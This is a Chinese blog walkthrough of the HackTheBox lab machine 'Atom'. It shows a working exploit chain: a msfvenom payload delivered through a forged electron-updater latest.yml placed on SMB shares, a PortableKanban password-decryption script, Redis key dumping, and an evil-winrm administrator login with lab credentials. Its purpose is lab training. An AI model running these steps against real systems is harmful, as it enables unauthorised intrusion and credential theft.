HTB-Atom

最新推荐文章于 2025-05-18 21:17:37 发布
最新推荐文章于 2025-05-18 21:17:37 发布
阅读量930 收藏 11
点赞数 22
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2201_75378806/article/details/139376096
版权

初始权限获取

端口扫描HTTP (80)、HTTPS (443)、RPC (135)、SMB (445)、WinRM (5985)、Redis (6379) 以及 7680 上的一些端口

SMB 报告是 Windows 10 Pro

尝试 redis-cli -h 10.10.10.237

10.10.10.237:6379> keys * (error) NOAUTH Authentication required.

错误,如果有凭证的话我还得来看看这个

枚举smb

这个目录

smbclient //10.10.10.237/Software_Updates

get UAT_Testing_Procedures.pdf

该文件是一份内部文件,描述了 Heed 的测试程序:

浏览一下应该是软件更新是通过将其放入 SMB 共享的 client 文件夹之一来测试的。

来到80,8080

该页面包含下载 Heed 的链接,Heed 是 QA 文档中提到的笔记应用程序。目前只有 Windows 版本,Mac 和 Linux 都说“即将推出”。我将获取 Windows 版本的副本,下载名称为 heed_setup_v1.0.0.zip

目录爆破一下没有什么有用的

pdf里面的这些信息看起来有用,好像是漏洞利用

Software_Updates漏洞

用 msfvenom 创建了我的有效负载并将其传递给 shasum

┌──(kali㉿kali)-[~/atom] └─$ shasum -a 512 up'date.exe | cut -d " " -f1 | xxd -r -p | base64 VuQnE40qqkhwLYqeXyaAJUisRZsbOkLTaS7mXCihNWEkicSWqwZxX+ihXiX1Secyc4fBVvLcbaIr RhRUhKXRtA==

1j6MyYLtoIB2xb/Bre5ZrvxGQDRwLk1uI9CjqTfsBL5mQlLbdiPxgN+996zUe6ceovJyUpVfnGNJPDDI/jnjvg==

生成sha512

然后touch创建一个文件latest.yml并把以下内容放入其中:

version: 1.2.3 path: http://10.10.14.29/f4T1H.'exe sha512: 1j6MyYLtoIB2xb/Bre5ZrvxGQDRwLk1uI9CjqTfsBL5mQlLbdiPxgN+996zUe6ceovJyUpVfnGNJPDDI/jnjvg== releaseDate: '2021-03-16T11:17:02.627Z'

在端口上启动 http 服务器80

php -S 0.0.0.0:80
最后执行以下操作以便将您的放入latest.yml所有客户端文件夹中。
smbclient -N //10.10.10.237/Software_Updates -c 'put latest.yml client1/latest.yml; put latest.yml client2/latest.yml; put latest.yml client3/latest.yml'

nc监听

提权

在枚举用户目录时,我注意到一个目录,其名称我以前从未听说过。我们在其中找到了一个配置 (.cfg) 文件。

Dir Downloads\PortableKanban

什么是一.cfg 文件? 具有.cfg 扩展名的文件是一种“设置"文件。 它是一种常用的文件类型,用于存储有关计算机程序配置和设置的信息。 大多数类型的CFG 文件都以文本格式存储,不应手动打开,而应使用文本编辑器打开。

这看起来像一个JSON数据,将其保存在本地的文件中并使用jq.

cat configFile.cfg | jq . | head

  • 登录时使用的加密密码RedisServerOdh7N3L9aVSeHQmgK/nj7RQL8MEYCUMb

我们先尝试破解密码,然后再重点关注redis

portablekanban解密密码或者redis获得密码

搜索portablekanban如何解密码

https://www.exploit-db.com/exploits/49409z

#!/usr/bin/python3

import base64 from des import * #pip3 install des

def decode(hash): hash = base64.b64decode(hash.encode('utf-8')) key = DesKey(b'7ly6UznJ') return key.decrypt(hash, initial=b'XuVUm5fR', padding=True).decode('utf-8')

print(decode("Odh7N3L9aVSeHQmgK/nj7RQL8MEYCUMb"))

或者,我们可以从服务的配置文件中找到密码。

 type *.conf | findstr pass
密码是kidvscat_yes_kidvscat

6379 - Pentesting Redis | HackTricks | HackTricks redis使用

┌──(root💀f4T1H)-[~/hackthebox/atom/privesc] └─> redis-cli -h 10.10.10.237 -a kidvscat_yes_kidvscat Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe. 10.10.10.237:6379> ping PONG 10.10.10.237:6379> info keyspace

db0:keys=4,expires=0,avg_ttl=0 10.10.10.237:6379> select 0 OK 10.10.10.237:6379> keys *

  1. "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"

  2. "pk:ids:User"

  3. "pk:ids:MetaDataClass"

  4. "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0" 10.10.10.237:6379> get "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"{"Id":"ffffffffffffffffffffffffffffffff","SchemaVersion":"4.2.0.0","SchemaVersionModified":"\/Date(1617420120000-0700)\/","SchemaVersionModifiedBy":"e8e29158d70d44b1a1ba4949d52790a0","SchemaVersionChecked":"\/Date(-621355968000000000)\/","SchemaVersionCheckedBy":"00000000000000000000000000000000","TimeStamp":637530169345346438}"

10.10.10.237:6379> get "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0" {"Id":"e8e29158d70d44b1a1ba4949d52790a0","Name":"Administrator","Initials":"","Email":"","EncryptedPassword":"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi","Role":"Admin","Inactive":false,"TimeStamp":637530169606440253}" 10.10.10.237:6379>

  • 我们用于连接到远程服务器并使用我们找到的密码登录的第一个命令。

  • 连接后,ping命令用于测试连接是否仍然有效,或测量延迟。

  • 之后我们查看了关键的数据库,也是select唯一的数据库。

  • 然后keys在里面列出了。

  • 最后阅读密钥的内容。

也可以利用上面的代码解密

evil-winrm -i 10.10.10.237 -u administrator -p 'kidvscat_admin_@123'
kikifofo
关注
Python-爬虫请求~requsts~get
zbrj12345的博客
05-15 1万+
#二、数据解析: #1.正则 #2.bs4 #3.xpath #网络请求模块: #1.urllib from urllib import request #2.requests # 安装:pip install requests import requests #2.1GET请求 #urllib方法 base_url = "http://langlang2017.com" # respons...
Gromacs模拟一:配体-双链蛋白质复合物体系准备
基博的博客
03-30 3915
实践是检验一切的真理,这句话是一点也没错,教程也不一定全是对的,还是要自己做一遍。
GROMACS Tutorial 5-Protein-Ligand Complex
CocoCream的博客
03-17 5267
本例将指导使用者建立一个包含与配体配合的蛋白质(T4溶菌酶L99A/M102Q,T4 lysozyme L99A/M102Q)的模拟系统的过程。本教程特别关注处理与配体相关的问题,假设你熟悉基本的GROMACS操作和拓扑的内容。如果你还不甚了解,请在尝试这个教程之前参考一个更基本的教程。
[Meachines] [Hard] Travel Git+SSRF+memcache+TRP00F+LDIF-SSH特權升級
05-18 977
#Git #SSRF #memcache #PHP Deserialization #TRP00F #LDAP #LDIF #SSH
Linux-4.4-x86_64 内核配置选项简介
轮子工厂
10-15 5760
Linux-4.4-x86_64 内核配置选项简介 作者:金步国 64-bit kernel CONFIG_64BIT 编译64位内核.本文仅讲述x86_64(AMD64)平台的内核编译,所以这个是必选项. General setup 常规设置 Cross-compiler tool prefix CONFIG_CROSS_COMPILE 交叉编译工具前缀(比如"arm-linux...
CADD课程学习(13)-- 研究蛋白小分子动态相互作用-III(蛋白配体复合物 GROMACS)
发呆的比目鱼的博客
07-13 3849
CADD课程学习(13)-- 研究蛋白小分子动态相互作用-III(蛋白配体复合物 GROMACS)
Linux-3.10-x86_64 内核配置选项简介
kunkliu的博客
09-18 4254
http://www.jinbuguo.com/kernel/longterm-3_10-options.html Linux-3.10-x86_64 内核配置选项简介作者:金步国版权声明 本文作者是一位开源理念的坚定支持者,所以本文虽然不是软件,但是遵照开源的精神发布。无担保:本文作者不保证作品内容准确无误,亦不承担任何由于使用此文档所导致的损失。自由使用:任何人都可以自由的阅读/链接/打印此文档
Linux-4.x_x _64 内核配置选项简介
u013165704的博客
06-02 9495
Gentoo LinuxGentoo内核(gentoo-sources)特有的选项Gentoo Linux supportCONFIG_GENTOO_LINUX选"Y"后,将会自动选中那些在Gentoo环境中必须开启的内核选项,以避免用户遗漏某些必要的选项,减轻一些用户配置内核的难度.建议选"Y".Linux dynamic and persistent device naming (usersp...
MetaTwo
S753019的博客
11-20 9310
hack the box MetaTwo
【平板电脑内存管理与优化】:提升设备速度的实用策略
![intel-atom-z3735f平板电脑原理图intel-win8-平板设计参考图]... # 摘要 本文系统地探讨了平板电脑内存管理的各个方面,从基础理论到高级优化技术。文章首先介绍了内存的作用、工作原理以及不同类型内存的特性,随后...
【Win8平板电脑深度优化指南】:专家教你打造极致流畅体验
![intel-atom-z3735f平板电脑原理图intel-win8-平板设计参考图]... # 摘要 随着Windows 8平板电脑在市场上的推广和使用,对其性能优化的需求日益增长。本文旨在探讨Windows 8平板电脑系统性能的基础优化,包括硬件限制...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8708
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络上的人际交往.ppt
05-31
网络上的人际交往.ppt
利用Revit软件进行智能检查管线净高的方法.docx
06-01
利用Revit软件进行智能检查管线净高的方法.docx
MATLAB环境下PSS仿真模型电力系统振荡模式测试研究
06-01
《基于MATLAB的PSS仿真模型的电力系统振荡模式测试研究》是我的毕业论文课题。经过几个星期的辛勤搭建与调试,我终于完成了这个模型,现在我已经顺利毕业啦。这个模型是基于MATLAB 7.1版本开发的。希望它能够为大家提供便利。对了,我是南工程的,不知道学弟学妹们有没有看到这篇帖子,希望它能对你们有所帮助,哈哈。
基于卷积神经网络的调制信号识别算法
05-31
In this study, we explore the cutting-edge developments in machine learning using deep neural networks, specifically applying them to the task of radio modulation recognition. Utilizing the Keras framework with TensorFlow as the backend and the GitHub universal dataset, our research demonstrates that the performance of radio modulation recognition is not constrained by the depth of the neural network. Instead, future efforts should concentrate on enhancing the synchronization and equalization capabilities learned by the models. Breakthroughs in these areas are expected to arise from either innovative neural network architectures tailored for these tasks or through the development of novel training techniques.
ultralytics-yolo11通过X光图像识别骨折位置和类型-为临床治疗提供参考+数据集+训练好的模型.zip
最新发布
06-01
ultralytics-yolo11通过X光图像识别骨折位置和类型-为临床治疗提供参考+数据集+训练好的模型,包含有使用教程 1. 内部包含标注好的目标检测数据集,分别有yolo格式(txt文件)和voc格式标签(xml文件), 共458张图像, 已划分好数据集train,val, test,并附有data.yaml文件可直接用于yolov5,v8,v9,v10,v11,v12等算法的训练; 2. yolo目标检测数据集类别名:bone-fracture(骨折),包括 angle(角度)、fracture(骨折)、line(线条)、messed_up_angle(混乱角度)等 3. yolo项目用途:通过X光图像识别骨折位置和类型,为临床治疗提供参考 4. 可视化参考链接:https://blog.youkuaiyun.com/weixin_51154380/article/details/126395695?spm=1001.2014.3001.5502
基于java开发的水质监测与预测系统+源码(毕业设计&课程设计&项目开发)
06-01
基于java开发的水质监测与预测系统+源码,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用 基于java开发的水质监测与预测系统+源码,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用~ 基于java开发的水质监测与预测系统+源码,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用 基于java开发的水质监测与预测系统+源码,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用 基于java开发的水质监测与预测系统+源码,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用 基于java开发的水质监测与预测系统+源码,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用
会计电算化第六章EXCEL在总账处理中应用.ppt
05-31
会计电算化第六章EXCEL在总账处理中应用.ppt
nxc ldap escapetwo.htb -d sequel.htb -u 'rose' -p 'KxEPkKe6R8su' --users
04-08
### 使用 NXC 工具通过 LDAP 枚举域用户 NXC 是一款功能强大的网络扫描工具,支持多种协议操作,其中包括 LDAP 协议。要使用 NXC 进行 LDAP 用户枚举,可以通过指定域名、用户名和密码来实现。 以下是具体的命令结构以及如何执行的操作: #### 命令格式 ```bash nxc ldap <target-ip> -u <username> -p <password> --domain <domain-name> --users ``` 在此场景下,假设目标 IP 地址为 `10.10.10.10`,并提供给定的凭证 `rose/KxEPkKe6R8su` 和域名称 `sequel.htb`,完整的命令如下所示: ```bash nxc ldap 10.10.10.10 -u rose -p KxEPkKe6R8su --domain sequel.htb --users ``` 此命令会尝试通过 LDAP 连接到目标主机,并利用提供的凭据枚举域中的所有用户账户[^1]。 #### 脚本解释 - `-u`: 指定用于连接的目标用户名。 - `-p`: 提供对应的密码。 - `--domain`: 设置活动目录的域名。 - `--users`: 请求脚本返回当前域内的所有用户列表。 如果成功完成身份验证,则应显示一系列属于该域的有效用户条目;反之,在遇到错误时可以根据提示进一步排查原因(如无效凭据或权限不足等问题)。 #### 注意事项 为了确保能够顺利访问远程服务器上的资源,请确认以下几点: - 验证所提供的用户名 (`rose`) 及其关联密钥是否有效。 - 确认目标机器开放了必要的端口 (通常是 TCP/389 或者 SSL 加密模式下的 TCP/636),以便允许外部客户端发起查询请求。 - 如果防火墙规则阻止了这些通信路径,则可能需要调整配置或者寻找其他可用方法绕过限制条件。 --- ### 示例代码片段展示 Python 中基于 ldap3 的简单实现方式 对于更深入的理解,下面给出一段采用 python 编写的示例程序,它同样实现了上述提到的功能逻辑: ```python from ldap3 import Server, Connection, ALL server = Server('ldap.sequel.htb', get_info=ALL) user_dn = 'CN=rose,CN=Users,DC=sequel,DC=htb' password = 'KxEPkKe6R8su' try: conn = Connection(server, user=user_dn, password=password, auto_bind=True) # Search for all users within the domain. conn.search('dc=sequel,dc=htb', '(objectClass=person)', attributes=['sAMAccountName']) entries = conn.entries if not entries: print("No users found.") else: for entry in entries: print(entry.sAMAccountName.value) except Exception as e: error_code = str(e).split()[0].strip('(').strip(')') if error_code == '52e': print('账号密码不正确') elif error_code == '775': print('账号已锁定,请联系管理员或等待自动解锁') elif error_code == '533': print('账号已禁用') else: print(f'认证失败,请检查账号 {error_code}') ``` 以上脚本展示了如何构建一个基本的 LDAP 查询过程,其中包含了异常处理机制以应对可能出现的不同类型的登录问题。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值